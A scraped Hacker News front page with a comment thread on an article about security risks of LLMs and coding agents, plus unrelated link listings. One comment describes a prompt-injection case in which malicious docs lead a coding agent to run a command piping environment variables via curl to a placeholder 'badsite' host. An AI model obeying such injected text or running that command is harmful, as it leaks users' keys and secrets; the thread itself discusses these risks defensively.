frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

Open in hackernews

LLMs and coding agents are a security nightmare

https://garymarcus.substack.com/p/llms-coding-agents-security-nightmare
34•flail•1h ago

Comments

sneak•1h ago
I have recently written security-sensitive code using Opus 4. I of course reviewed every line and made lots of both manual and prompt-based revisions.

Cloudflare apparently did something similar recently.

It is more than possible to write secure code with AI, just as it is more than possible to write secure code with inexperienced junior devs.

As for the RCE vector; Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.

Separately from AI, most people deploy containers based on tagged version names, not cryptographic hashes. This is trivially exploitable by the container registry.

We have learned nothing from Solarwinds.

senko•1h ago
> Claude Code has realtime no-intervention autoupdate enabled by default. Everyone running it has willfully opted in to giving Anthropic releng (and anyone who can coerce/compel them) full RCE on their machine.

Isn't that the same for Chrome, VSCode, and any upstream-managed (as opposed to distro/os managed) package channel with auto updates?

It's a bad default, but pretty much standard practice, and done in the name of security.

senko•1h ago
tldr: Gary Marcus Went To Black Hat - What He Saw There Will Shock You

(it won't if you've been following LLM coding space, but anyway...)

I hoped Gary would have at least linked to the talks so people could get the actual info without his lenses, but no such luck.

But he did link to The Post A Few Years Ago Where He Predicted It All.

(yes I'm cynical: the post is mostly on point, but by now I wouldn't trust Marcus if he announced People Breathe Oxygen).

popcorncowboy•17m ago
The Gary Marcus Schtick at this point is to shit on LLM-anything, special extra poop if it's sama-anything. Great, I don't even disagree. But it's hard to read anything he puts up these days as he's become a caricature of the enlightened-LLM-hater to the extent that his work reads like auto-gen "whatever you said but the opposite, and also you suck, I'm Gary Marcus".
flail•14m ago
Save for Gary Marcus' ego, which you're right about, most of the article is written by Nathan Hamiel from Kudelski Security. The voice of the post sounds weird because Nathan is referred to in a third person, but from the content, it's pretty clear that much of that is not Gary Marcus.

Also, slides from the Nvidia talk, which they refer to a lot, are linked. The Nathan's presentation links only to the conference website.

dijksterhuis•56m ago
> RRT (Refrain Restrict Trap).

> Refrain from using LLMs in high-risk or safety-critical scenarios.

> Restrict the execution, permissions, and levels of access, such as what files a given system could read and execute, for example.

> Trap inputs and outputs to the system, looking for potential attacks or leakage of sensitive data out of the system.

this, this, this, a thousand billion times this.

this isn’t new advice either. it’s been around for circa ten years at this point (possibly longer).

diggan•48m ago
> might ok a code change they shouldn’t have

Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".

SamuelAdams•40m ago
I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.

If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?

IanCal•24m ago
Aside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.
reilly3000•21m ago
The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d - and steal your keys.
flail•22m ago
One thing relying on coding agents does is it changes the nature of the work from typing-heavy (unless you count prompting) to code-review-heavy.

Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.

Sure, some of that thinking would go into prompting, but not to such a detail as when coding.

What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.

A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.

An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.

Web apps in a single, portable, self-updating, vanilla HTML file

https://hyperclay.com/
320•pil0u•6h ago•93 comments

Electromechanical reshaping, an alternative to laser eye surgery

https://medicalxpress.com/news/2025-08-alternative-lasik-lasers.html
54•Gaishan•3h ago•9 comments

MCP doesn't need tools, it needs code

https://lucumr.pocoo.org/2025/8/18/code-mcps/
68•the_mitsuhiko•2h ago•44 comments

MCP tools with dependent types

https://vlaaad.github.io/mcp-tools-with-dependent-types
24•vlaaad•2h ago•3 comments

It's the Housing, Stupid

https://ofdollarsanddata.com/its-the-housing-stupid/
42•throw0101c•50m ago•31 comments

A gigantic jet caught on camera: A spritacular moment for NASA astronaut

https://science.nasa.gov/science-research/heliophysics/a-gigantic-jet-caught-on-camera-a-spritacular-moment-for-nasa-astronaut-nicole-ayers/
245•acossta•3d ago•57 comments

Sky Calendar

https://abramsplanetarium.org/SkyCalendar/index.html
5•NaOH•2d ago•0 comments

Walkie-Textie Wireless Communicator

http://www.technoblogy.com/show?2AON
23•chrisjj•2d ago•9 comments

SystemD Service Hardening

https://roguesecurity.dev/blog/systemd-hardening
95•todsacerdoti•7h ago•29 comments

Claudia – Desktop companion for Claude code

https://claudiacode.com/
447•zerealshadowban•19h ago•206 comments

The Lives and Loves of James Baldwin

https://www.newyorker.com/magazine/2025/08/18/baldwin-a-love-story-nicholas-boggs-book-review
32•Caiero•13h ago•6 comments

8x19 Text Mode Font Origins

https://www.os2museum.com/wp/8x19-text-mode-font-origins/
18•userbinator•2d ago•5 comments

Unification (2018)

https://eli.thegreenplace.net/2018/unification/
50•asplake•5h ago•8 comments

The Enterprise Experience

https://churchofturing.github.io/the-enterprise-experience.html
420•Improvement•19h ago•122 comments

Llama-Scan: Convert PDFs to Text W Local LLMs

https://github.com/ngafar/llama-scan
177•nawazgafar•15h ago•73 comments

Clojure Async Flow Guide

https://clojure.github.io/core.async/flow-guide.html
175•simonpure•11h ago•68 comments

Website is served from nine Neovim buffers on my old ThinkPad

https://vim.gabornyeki.com/
41•todsacerdoti•1h ago•6 comments

Scientists discover surprising language 'shortcuts' in birdsong – like humans

https://www.manchester.ac.uk/about/news/scientists-discover-surprising-language-shortcuts-in-birdsong--just-like-humans/
16•gnufx•3d ago•9 comments

LLMs and coding agents are a security nightmare

https://garymarcus.substack.com/p/llms-coding-agents-security-nightmare
34•flail•1h ago•11 comments

Nvidia Tilus: A Tile-Level GPU Kernel Programming Language

https://github.com/NVIDIA/tilus
43•ashvardanian•3d ago•22 comments

Viking-Age hoard reveals trade between England and the Islamic World

https://www.heritagedaily.com/2025/08/viking-age-hoard-reveals-trade-between-england-and-the-islamic-world/155786
52•bookofjoe•3d ago•39 comments

The circular economy could make demolition a thing of the past

https://theconversation.com/the-circular-economy-could-make-demolition-a-thing-of-the-past-heres-how-261678
8•PaulHoule•1h ago•2 comments

Mangle – a language for deductive database programming

https://github.com/google/mangle
75•simonpure•11h ago•14 comments

Show HN: OverType – A Markdown WYSIWYG editor that's just a textarea

377•panphora•20h ago•89 comments

Google admits anti-competitive conduct involving Google Search in Australia

https://www.accc.gov.au/media-release/google-admits-anti-competitive-conduct-involving-google-search-in-australia
232•Improvement•9h ago•146 comments

Show HN: Doxx – Terminal .docx viewer inspired by Glow

https://github.com/bgreenwell/doxx
215•w108bmg•16h ago•56 comments

Derivatives, Gradients, Jacobians and Hessians

https://blog.demofox.org/2025/08/16/derivatives-gradients-jacobians-and-hessians-oh-my/
259•ibobev•22h ago•64 comments

Show HN: NextDNS Adds "Bypass Age Verification"

459•nextdns•22h ago•155 comments

Non-Uniform Memory Access (NUMA) is reshaping microservice placement

https://codemia.io/blog/path/NUMA-Is-the-New-Network-How-Per-Socket-Memory-Models-Are-Reshaping-Microservice-Placement
77•signa11•11h ago•24 comments

Modifying other people's software

https://natkr.com/2025-08-14-modifying-other-peoples-software/
63•todsacerdoti•4d ago•32 comments